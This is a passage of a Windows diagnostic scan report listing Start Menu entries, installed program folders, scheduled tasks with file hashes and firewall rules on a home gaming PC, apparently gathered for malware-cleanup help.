[12/02/2017 17:27:10] - |D| - [1688] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hearts of Iron IV Together for Victory
[30/11/2016 23:45:22] - |D| - [1609] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Iron Europe
[20/11/2014 17:39:13] - |D| - [8878] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[03/07/2017 17:18:13] - |D| - [1282] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kalypso Media
[17/06/2016 19:27:41] - |D| - [3037] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kalypso Media Digital
[06/08/2016 22:24:05] - |D| - [1279] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LCPD First Response
[04/03/2015 15:07:40] - |D| - [1557] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
[28/06/2017 23:44:14] - |D| - [1088] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mafia II
[14/07/2009 03:20:08] - |RD| - [4370] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance
[27/06/2017 12:08:33] - |D| - [3794] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
[07/11/2014 10:53:00] - |A| - [1345] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
[22/06/2015 14:21:13] - |D| - [1096] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mephisto
[07/05/2015 12:10:22] - |D| - [27996] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft DirectX SDK (November 2008)
[24/06/2015 13:10:51] - |D| - [1245] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Games for Windows - LIVE
[07/11/2014 11:48:08] - |D| - [32320] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
[07/05/2015 08:41:05] - |D| - [2265] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
[08/07/2016 17:07:46] - |D| - [1955] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Modem HDM EC156
[22/07/2015 13:02:29] - |D| - [1834] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Modem X080C Plus
[25/04/2015 08:42:36] - |A| - [847] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mount&Blade Dedicated Server [by iMortaluz].lnk
[25/04/2015 08:42:36] - |A| - [1000] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mount&Blade Settings.lnk
[12/04/2015 18:51:07] - |D| - [2092] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mount&Blade Warband
[07/11/2014 18:48:32] - |D| - [1183] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mount&Blade With Fire and Sword
[25/04/2015 08:42:36] - |A| - [982] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mount&Blade With Fire and Sword [by iMortaluz].lnk
[07/11/2014 11:39:58] - |A| - [1061] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[11/11/2016 18:14:25] - |D| - [3260] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mr DJ
[07/11/2014 11:43:23] - |D| - [12254] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nero
[23/01/2016 09:52:43] - |D| - [2841] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nexus Mod Manager
[07/11/2014 17:06:01] - |A| - [780] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
[07/11/2014 17:06:45] - |D| - [14084] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
[07/12/2014 15:04:15] - |D| - [4283] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PhotoFiltre 7
[30/08/2016 02:21:39] - |D| - [1740] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Catalyst
[26/07/2015 20:33:03] - |D| - [2349] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Gamblers
[21/01/2015 11:48:55] - |D| - [3088] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Games
[07/11/2014 17:31:04] - |D| - [2418] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics
[02/12/2014 20:16:43] - |D| - [9047] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Radical Games
[09/04/2016 10:57:24] - |D| - [2037] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Raptr
[14/11/2014 22:24:00] - |D| - [431] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razor 1911
[07/11/2014 11:42:03] - |D| - [3390] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RealNetworks
[12/07/2015 00:03:19] - |D| - [2870] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Relic Entertainment
[20/11/2014 11:16:50] - |D| - [14456] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rockstar Games
[20/11/2014 11:34:00] - |D| - [1453] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer
[14/07/2009 04:57:08] - |A| - [1330] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
[24/05/2016 22:53:32] - |D| - [2137] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[17/03/2017 18:48:40] - |D| - [2062] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Snowbird Games
[05/06/2015 12:35:15] - |D| - [1861] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SoftPerfect WiFi Guard
[26/06/2015 00:48:00] - |D| - [2783] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SQUARE ENIX
[14/07/2009 03:20:08] - |RD| - [174] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
[22/11/2014 13:21:08] - |D| - [3606] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
[10/04/2017 23:36:02] - |D| - [1477] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stellaris Utopia
[14/07/2009 15:35:18] - |RHD| - [0] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tablet PC
[26/08/2015 17:34:50] - |D| - [3496] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TaleWorlds Entertainment
[15/10/2015 10:36:18] - |D| - [1775] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
[27/01/2017 15:42:29] - |A| - [929] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client.lnk
[14/11/2014 11:28:30] - |D| - [2347] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Creative Assembly
[20/11/2014 15:25:20] - |D| - [2865] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\This War of Mine
[12/12/2016 20:31:55] - |D| - [1021784140] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TortoiseSVN
[08/01/2017 18:25:42] - |D| - [2074] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tunngle
[06/12/2015 09:12:01] - |D| - [1610] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Victoria II - A Heart of Darkness
[07/11/2014 11:41:51] - |D| - [6750] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
[14/07/2009 04:57:09] - |A| - [1352] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk
[07/11/2014 10:52:49] - |A| - [1326] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
[14/07/2009 04:54:59] - |A| - [1210] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
[02/01/2017 20:44:51] - |D| - [6738] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media
[14/07/2009 04:57:06] - |A| - [1547] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
[07/11/2014 11:39:25] - |D| - [4149] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
[22/02/2016 16:36:02] - |D| - [1867] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
[15/01/2017 18:20:45] - |D| - [4574] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WizardWorks
[26/12/2014 20:35:44] - |D| - [1178] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft
[14/07/2009 04:57:08] - |A| - [1246] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk

---------- | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

[14/07/2009 04:54:23] - |ASH| - [174] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini

---------- | C:\Program Files (x86)

[02/12/2014 20:23:23] - |D| - [4332924] - C:\Program Files (x86)\3DRipperDX
[21/01/2017 13:43:53] - |D| - [264768951] - C:\Program Files (x86)\Adobe
[18/02/2017 01:54:15] - |D| - [0] - C:\Program Files (x86)\AGEIA Technologies
[05/07/2015 20:47:46] - |D| - [57289920] - C:\Program Files (x86)\AMD
[05/07/2015 20:49:01] - |D| - [764784] - C:\Program Files (x86)\AMD AVT
[07/11/2014 11:29:08] - |D| - [2114096] - C:\Program Files (x86)\Analog Devices
[01/11/2015 12:32:13] - |D| - [38956605] - C:\Program Files (x86)\Bandicam
[01/11/2015 12:32:12] - |D| - [9120189] - C:\Program Files (x86)\BandiMPEG1
[27/06/2015 14:07:46] - |D| - [13659619094] - C:\Program Files (x86)\Bethesda Softworks
[14/06/2017 14:48:18] - |D| - [1365] - C:\Program Files (x86)\BZip
[03/07/2017 18:50:38] - |D| - [39612853] - C:\Program Files (x86)\Cheat Engine 6.6
[14/07/2009 03:20:08] - |D| - [488089077] - C:\Program Files (x86)\Common Files
[07/11/2014 17:03:35] - |D| - [28300703] - C:\Program Files (x86)\DAEMON Tools Lite
[14/07/2009 04:54:24] - |ASH| - [174] - C:\Program Files (x86)\desktop.ini
[09/01/2017 18:58:55] - |D| - [72901342] - C:\Program Files (x86)\DVDVideoSoft
[22/05/2015 17:20:55] - |D| - [14678594327] - C:\Program Files (x86)\EA Games
[01/02/2017 21:03:17] - |D| - [6757036140] - C:\Program Files (x86)\Eidos
[05/01/2015 13:59:54] - |D| - [5910285893] - C:\Program Files (x86)\Electronic Arts
[20/01/2017 22:21:28] - |D| - [103549] - C:\Program Files (x86)\ForceBindIP
[19/06/2016 22:40:51] - |D| - [30667877] - C:\Program Files (x86)\FreeArc
[07/11/2014 11:39:59] - |D| - [406852262] - C:\Program Files (x86)\Google
[19/06/2016 18:35:28] - |D| - [1873890] - C:\Program Files (x86)\GPU-Z
[24/06/2015 12:01:36] - |D| - [16628835361] - C:\Program Files (x86)\Grand Theft Auto IV - Episodes From Liberty City
[06/06/2016 19:35:17] - |D| - [243178] - C:\Program Files (x86)\Hearts.of.Iron.IV.Field.Marshal.Edition-3DM
[06/06/2016 23:10:53] - |D| - [243178] - C:\Program Files (x86)\IGG-Hearts.of.Iron.IV.Field.Marshal.Edition
[20/11/2014 11:16:50] - |HD| - [50484252] - C:\Program Files (x86)\InstallShield Installation Information
[28/04/2017 13:12:19] - |D| - [15189914] - C:\Program Files (x86)\Internet Download Manager
[14/07/2009 03:20:08] - |D| - [4594981] - C:\Program Files (x86)\Internet Explorer
[20/11/2014 17:38:58] - |D| - [143160743] - C:\Program Files (x86)\Java
[17/06/2016 19:26:27] - |D| - [3515752358] - C:\Program Files (x86)\Kalypso Media Digital
[31/01/2015 12:36:29] - |D| - [0] - C:\Program Files (x86)\Malwarebytes Anti-Malware
[12/07/2015 00:31:23] - |D| - [0] - C:\Program Files (x86)\MDickie
[18/01/2017 14:27:02] - |A| - [212] - C:\Program Files (x86)\metadata
[07/05/2015 12:08:30] - |D| - [1175903216] - C:\Program Files (x86)\Microsoft DirectX SDK (November 2008)
[11/01/2015 14:24:47] - |D| - [9278070] - C:\Program Files (x86)\Microsoft Games for Windows - LIVE
[07/11/2014 11:45:23] - |D| - [574763637] - C:\Program Files (x86)\Microsoft Office
[07/05/2015 08:41:00] - |D| - [42890830] - C:\Program Files (x86)\Microsoft Silverlight
[07/11/2014 11:47:22] - |D| - [14904] - C:\Program Files (x86)\Microsoft Visual Studio
[07/11/2014 11:45:43] - |D| - [1387249] - C:\Program Files (x86)\Microsoft Visual Studio 8
[07/11/2014 11:47:29] - |D| - [3726168] - C:\Program Files (x86)\Microsoft Works
[05/01/2015 14:03:58] - |D| - [979309] - C:\Program Files (x86)\Microsoft WSE
[07/11/2014 11:47:17] - |D| - [8175999] - C:\Program Files (x86)\Microsoft.NET
[08/07/2016 17:06:52] - |D| - [90020668] - C:\Program Files (x86)\Modem HDM EC156
[07/11/2014 11:39:56] - |D| - [82125598] - C:\Program Files (x86)\Mozilla Firefox
[07/11/2014 11:39:57] - |D| - [219147] - C:\Program Files (x86)\Mozilla Maintenance Service
[11/11/2016 18:04:15] - |D| - [7899529852] - C:\Program Files (x86)\Mr DJ
[14/07/2009 05:32:38] - |D| - [26521] - C:\Program Files (x86)\MSBuild
[14/02/2017 23:23:40] - |D| - [0] - C:\Program Files (x86)\MSXML 4.0
[07/11/2014 11:43:17] - |D| - [58716483] - C:\Program Files (x86)\Nero
[05/04/2016 16:30:35] - |D| - [187208110] - C:\Program Files (x86)\NVIDIA Corporation
[07/11/2014 17:06:00] - |D| - [234791157] - C:\Program Files (x86)\Opera
[14/06/2017 14:48:08] - |D| - [372] - C:\Program Files (x86)\pavd4r3t5av
[07/12/2014 15:04:14] - |D| - [8324967] - C:\Program Files (x86)\PhotoFiltre 7
[01/07/2015 22:23:22] - |D| - [2925808907] - C:\Program Files (x86)\Radical Games
[07/11/2014 11:41:51] - |D| - [94604803] - C:\Program Files (x86)\Real
[14/07/2009 05:32:38] - |D| - [39171329] - C:\Program Files (x86)\Reference Assemblies
[11/01/2015 14:00:24] - |D| - [26454569025] - C:\Program Files (x86)\Rockstar Games
[11/01/2017 11:52:11] - |D| - [2896248] - C:\Program Files (x86)\Sands of Faith v2.0
[24/05/2016 22:53:31] - |RD| - [84986085] - C:\Program Files (x86)\Skype
[11/03/2016 12:16:01] - |A| - [2459593] - C:\Program Files (x86)\SSFK.exe
[22/11/2014 18:35:17] - |D| - [63013197145] - C:\Program Files (x86)\Steam
[20/11/2014 17:33:56] - |D| - [644681] - C:\Program Files (x86)\SystemRequirementsLab
[08/01/2017 18:25:40] - |D| - [73378962] - C:\Program Files (x86)\Tunngle
[14/07/2009 04:57:06] - |HD| - [0] - C:\Program Files (x86)\Uninstall Information
[07/11/2014 11:41:43] - |D| - [99005902] - C:\Program Files (x86)\VideoLAN
[14/07/2009 05:32:38] - |D| - [524800] - C:\Program Files (x86)\Windows Defender
[14/07/2009 03:20:08] - |D| - [6181376] - C:\Program Files (x86)\Windows Mail
[02/01/2017 20:44:50] - |D| - [14028939] - C:\Program Files (x86)\Windows Media Components
[14/07/2009 05:32:38] - |D| - [5024017] - C:\Program Files (x86)\Windows Media Player
[14/07/2009 03:20:08] - |D| - [12197556] - C:\Program Files (x86)\Windows NT
[14/07/2009 05:32:38] - |D| - [4417800] - C:\Program Files (x86)\Windows Photo Viewer
[14/07/2009 05:32:38] - |D| - [189952] - C:\Program Files (x86)\Windows Portable Devices
[14/07/2009 05:32:38] - |D| - [5994626] - C:\Program Files (x86)\Windows Sidebar
[07/11/2014 11:39:24] - |D| - [4683418] - C:\Program Files (x86)\WinRAR
[15/01/2017 18:15:01] - |D| - [3583578479] - C:\Program Files (x86)\WizardWorks
[31/01/2015 08:53:49] - |D| - [0] - C:\Program Files (x86)\ZHPDiag

---------- | C:\Program Files

[14/07/2009 03:20:08] - |D| - [60] - C:\Program Files\32xx14 - AlMune DLL
[09/12/2015 18:02:48] - |D| - [4941193] - C:\Program Files\7-Zip
[05/07/2015 20:45:34] - |D| - [94607325] - C:\Program Files\AMD
[07/11/2014 11:59:11] - |D| - [655899327] - C:\Program Files\AVAST Software
[21/01/2015 10:00:44] - |D| - [10583239623] - C:\Program Files\AWAR
[31/01/2015 17:36:18] - |D| - [15810424] - C:\Program Files\CCleaner
[14/07/2009 03:20:08] - |D| - [77624688] - C:\Program Files\Common Files
[14/07/2009 04:54:24] - |ASH| - [174] - C:\Program Files\desktop.ini
[14/07/2009 05:32:38] - |D| - [90256916] - C:\Program Files\DVD Maker
[07/11/2014 11:06:39] - |SHD| - [77624688] - C:\Program Files\Fichiers communs
[06/02/2017 13:37:12] - |D| - [178127598] - C:\Program Files\FreeDownloadManager.ORG
[14/07/2009 03:20:08] - |D| - [5182765] - C:\Program Files\Internet Explorer
[02/04/2016 18:30:05] - |D| - [519026] - C:\Program Files\kbdhefr2
[03/06/2015 18:12:56] - |D| - [1199] - C:\Program Files\Logs
[27/06/2017 12:08:26] - |D| - [137393410] - C:\Program Files\Malwarebytes
[07/11/2014 11:45:46] - |D| - [593814] - C:\Program Files\Microsoft Office
[07/05/2015 08:41:00] - |D| - [55721038] - C:\Program Files\Microsoft Silverlight
[22/07/2015 13:02:12] - |D| - [10020199] - C:\Program Files\Modem X080C Plus
[14/07/2009 05:32:38] - |D| - [25757] - C:\Program Files\MSBuild
[23/01/2016 09:52:42] - |D| - [24423193] - C:\Program Files\Nexus Mod Manager
[05/04/2016 16:29:19] - |D| - [194356009] - C:\Program Files\NVIDIA Corporation
[14/07/2009 03:20:08] - |D| - [9546] - C:\Program Files\Office froggerial Table
[14/07/2009 05:32:38] - |D| - [36830377] - C:\Program Files\Reference Assemblies
[24/07/2015 18:02:27] - |D| - [113316692] - C:\Program Files\Rockstar Games
[05/06/2015 12:35:14] - |D| - [5183281] - C:\Program Files\SoftPerfect WiFi Guard
[15/10/2015 10:36:17] - |D| - [183657529] - C:\Program Files\TeamSpeak 3 Client
[12/12/2016 20:31:52] - |D| - [44548917] - C:\Program Files\TortoiseSVN
[14/07/2009 05:09:26] - |HD| - [0] - C:\Program Files\Uninstall Information
[14/07/2009 05:32:38] - |D| - [4039680] - C:\Program Files\Windows Defender
[14/07/2009 15:35:39] - |D| - [9240696] - C:\Program Files\Windows Journal
[14/07/2009 03:20:08] - |D| - [6667776] - C:\Program Files\Windows Mail
[14/07/2009 05:32:38] - |D| - [7687085] - C:\Program Files\Windows Media Player
[14/07/2009 03:20:08] - |D| - [12627636] - C:\Program Files\Windows NT
[14/07/2009 05:32:38] - |D| - [5516056] - C:\Program Files\Windows Photo Viewer
[14/07/2009 05:32:38] - |D| - [244736] - C:\Program Files\Windows Portable Devices
[14/07/2009 05:32:38] - |D| - [7289286] - C:\Program Files\Windows Sidebar
[14/06/2017 15:30:10] - |D| - [550912] - C:\Program Files\XW729QLLTN

---------- | C:\Program Files (x86)\Common Files

[07/11/2014 11:43:49] - |D| - [9307355] - C:\Program Files (x86)\Common Files\Adobe
[05/07/2015 20:48:59] - |D| - [2460960] - C:\Program Files (x86)\Common Files\ATI Technologies
[30/06/2016 14:37:16] - |D| - [4319256] - C:\Program Files (x86)\Common Files\BattlEye
[08/07/2017 13:47:53] - |D| - [156880] - C:\Program Files (x86)\Common Files\Betastring
[20/01/2017 18:56:08] - |D| - [99992] - C:\Program Files (x86)\Common Files\DESIGNER
[09/01/2017 18:59:01] - |D| - [93241048] - C:\Program Files (x86)\Common Files\DVDVideoSoft
[20/11/2014 11:14:49] - |D| - [10325084] - C:\Program Files (x86)\Common Files\InstallShield
[12/02/2015 23:00:05] - |D| - [2151833] - C:\Program Files (x86)\Common Files\Java
[15/02/2017 20:59:09] - |D| - [44003] - C:\Program Files (x86)\Common Files\Microsoft Games
[14/07/2009 03:20:08] - |D| - [236694700] - C:\Program Files (x86)\Common Files\microsoft shared
[07/11/2014 11:43:16] - |D| - [36738114] - C:\Program Files (x86)\Common Files\Nero
[14/07/2009 03:20:08] - |D| - [2702] - C:\Program Files (x86)\Common Files\Services
[25/01/2017 17:43:48] - |D| - [2581120] - C:\Program Files (x86)\Common Files\Skype
[14/07/2009 03:20:08] - |D| - [41103783] - C:\Program Files (x86)\Common Files\SpeechEngines
[22/11/2014 13:21:09] - |D| - [3774016] - C:\Program Files (x86)\Common Files\Steam
[14/07/2009 03:20:08] - |D| - [44314877] - C:\Program Files (x86)\Common Files\System
[12/12/2016 20:31:53] - |D| - [421098] - C:\Program Files (x86)\Common Files\TortoiseOverlays
[07/11/2014 11:42:08] - |D| - [352256] - C:\Program Files (x86)\Common Files\xing shared

---------- | C:\Program Files\Common files

[07/11/2014 11:28:09] - |D| - [4041857] - C:\Program Files\Common files\ATI Technologies
[14/07/2009 03:20:08] - |D| - [57390285] - C:\Program Files\Common files\Microsoft Shared
[14/07/2009 03:20:08] - |D| - [2702] - C:\Program Files\Common files\Services
[14/07/2009 03:20:08] - |D| - [608768] - C:\Program Files\Common files\SpeechEngines
[14/07/2009 03:20:08] - |D| - [12194291] - C:\Program Files\Common files\System
[12/12/2016 20:31:52] - |D| - [3386785] - C:\Program Files\Common files\TortoiseOverlays

---------- | Tasks

[MD5.F1A6CD5ADAAB953A6764EA364E17BFB8] - [14/07/2009 05:08:49] - |AH| - [6] - C:\Windows\Tasks\SA.DAT
[MD5.59F5E72731B11CFCE41AE085E12EA3C5] - [14/07/2009 05:08:49] - |A| - [32496] - C:\Windows\Tasks\SCHEDLGU.TXT
[MD5.943A4FC91AD754E587168E64228B75FF] - [28/02/2017 22:03:18] - |A| - [16718] - C:\Windows\System32\Tasks\22T4545C8369Q363         :   C:\Windows\system32\rundll32.exe
[MD5.A5FE39C5BD2600307D574E4B2AB3241B] - [17/06/2016 02:11:29] - |A| - [4476] - C:\Windows\System32\Tasks\Adobe Acrobat Update Task         :   C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
[MD5.C056FD843344B86A957BBE594371EB39] - [14/07/2015 00:02:35] - |A| - [4484] - C:\Windows\System32\Tasks\Adobe Flash Player Updater         :   C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
[MD5.DDDA009809BFC0E04538245F7BDCEA6D] - [17/01/2017 23:28:45] - |A| - [4238] - C:\Windows\System32\Tasks\AMD Updater         :   "C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe"
[MD5.7F3D45AA9212F221B3B03093DF9ECBB7] - [31/01/2015 17:36:20] - |A| - [2766] - C:\Windows\System32\Tasks\CCleanerSkipUAC         :   "C:\Program Files\CCleaner\CCleaner.exe"
[MD5.00000000000000000000000000000000] - [27/11/2015 20:31:09] - |D| - [0] - C:\Windows\System32\Tasks\Games
[MD5.2C1ECFDE17F89242DDA5E50E33B53BC4] - [07/11/2014 11:40:03] - |A| - [3372] - C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore         :   C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
[MD5.CD5A23862DB7BF664DE344A153D889DD] - [07/11/2014 11:40:05] - |A| - [3500] - C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA         :   C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
[MD5.00000000000000000000000000000000] - [14/07/2009 03:20:13] - |D| - [272622] - C:\Windows\System32\Tasks\Microsoft
[MD5.4CD8450B6B613A710D270B65A8C6CCBB] - [18/01/2017 14:10:38] - |A| - [3188] - C:\Windows\System32\Tasks\RealUpgradeLogonTaskS-1-5-21-2557276657-2545994043-460956459-1000         :   C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe
[MD5.A6D0E1E53583B6A2CE00DC322E315BC4] - [18/01/2017 14:10:34] - |A| - [3328] - C:\Windows\System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-2557276657-2545994043-460956459-1000         :   C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe
[MD5.00000000000000000000000000000000] - [14/07/2009 05:09:57] - |D| - [4464] - C:\Windows\System32\Tasks\WPD
[MD5.81842CA5A89F7B86AB9C9A5214BF6538] - [07/05/2015 08:50:21] - |A| - [2956] - C:\Windows\System32\Tasks\{69D1ADEB-1CE8-4F4E-A7E6-E4395D1587CB}         :   D:\CK II\Crusader Kings II - Collection\CK2game.exe
[MD5.0322EB02B49114E95366B8EBB8996FC4] - [07/05/2015 09:48:48] - |A| - [2936] - C:\Windows\System32\Tasks\{97DBCC3A-3FD3-4BEA-8419-96B335788151}         :   D:\The Saboteur\The Saboteur\Saboteur.exe
[MD5.0322EB02B49114E95366B8EBB8996FC4] - [07/05/2015 09:47:29] - |A| - [2936] - C:\Windows\System32\Tasks\{99EF7424-3012-4A0D-B554-2DAB4DFDC05B}         :   D:\The Saboteur\The Saboteur\Saboteur.exe
[MD5.F3DFBCCE07E298C9613E9F75A93C7DB8] - [14/01/2017 10:27:12] - |A| - [3370] - C:\Windows\System32\Tasks\{C94C0197-D567-4783-8178-097AF3D224F4}         :   C:\Windows\system32\pcalua.exe
[MD5.4F00BB50C7BC2574FDB718D96479FC16] - [02/12/2014 21:12:43] - |A| - [3402] - C:\Windows\System32\Tasks\{CB1DF63E-DA0E-40C7-8F23-63311EA6CE99}         :   C:\Windows\system32\pcalua.exe
[MD5.0158E2DC933F05029E0E7EC944CD66B6] - [08/01/2016 06:46:33] - |A| - [3240] - C:\Windows\System32\Tasks\{CEAB3CB1-7742-4DFA-8739-44966BA19B77}         :   C:\Windows\system32\pcalua.exe
[MD5.00000000000000000000000000000000] - [14/07/2009 03:20:14] - |D| - [0] - C:\Windows\Syswow64\Tasks\Microsoft

---------- | Firewall

[HKLM\SYSTEM\CurrentControlSet\Services\sharedaccess\Parameters\FirewallPolicy\FirewallRules]
"Netlogon-NamedPipe-In"=v2.10|Action=Allow|Active=FALSE|Dir=In|Protocol=6|LPort=445|App=System|Name=@netlogon.dll,-1003|Desc=@netlogon.dll,-1006|EmbedCtxt=@netlogon.dll,-1010|
"{3DAE5CFD-652F-4679-A6D0-4418D7DD83C9}"=v2.10|Action=Allow|Active=FALSE|Dir=In|Protocol=6|LPort=808|App=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe|Svc=NetTcpActivator|Name=@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelEvents.dll,-2000|Desc=@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelEvents.dll,-2001|EmbedCtxt=@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelEvents.dll,-2002|
"{772BF8B9-C89C-47EC-A0BD-8186B1B1D7BC}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe|Name=Grand Theft Auto IV|
"{B8F6075F-E27A-4B83-AD7F-549206F23B23}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe|Name=Grand Theft Auto IV|
"TCP Query User{F41FC956-D6E8-47D8-B84E-7DBBA36BA5BA}C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe|Name=Grand Theft Auto IV|Desc=Grand Theft Auto IV|Defer=User|
"UDP Query User{F1396FF1-92D4-4037-8608-165DC4E4E074}C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\program files (x86)\rockstar games\grand theft auto iv\gtaiv.exe|Name=Grand Theft Auto IV|Desc=Grand Theft Auto IV|Defer=User|
"{A55B5DFA-B128-4DFA-A4CD-5F9DFA13419C}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=80|Name=War Thunder|
"{89961277-8452-4948-9A85-43F4EB195A9D}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=443|Name=War Thunder|
"{E0509664-24CF-4AB8-9D54-15E5C8F1D87B}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|LPort=20010|Name=War Thunder|
"{F28C49B3-9F92-40D5-B681-4D428DF6B85A}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|LPort=3478|Name=War Thunder|
"{E2635311-72D0-4199-9830-3B51168E9F0B}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=7850|Name=War Thunder|
"{BBD10081-89B0-4C85-8BAA-FFCA75557421}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=7852|Name=War Thunder|
"{EDFF92FD-42D6-4E32-843A-F8DBAF2884D6}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=7853|Name=War Thunder|
"{16AD04B8-2BE7-48AC-863E-5A7C31B8D6AE}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=27022|Name=War Thunder|
"{BBF83278-5E5F-419A-8812-19E032D5BE78}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=6881|Name=War Thunder|
"{7B648099-823A-4751-B15B-B7B88177C5AF}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=33333|Name=War Thunder|
"{3581B64F-4024-4F29-A74B-EAA3074581A5}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|LPort=20443|Name=War Thunder|
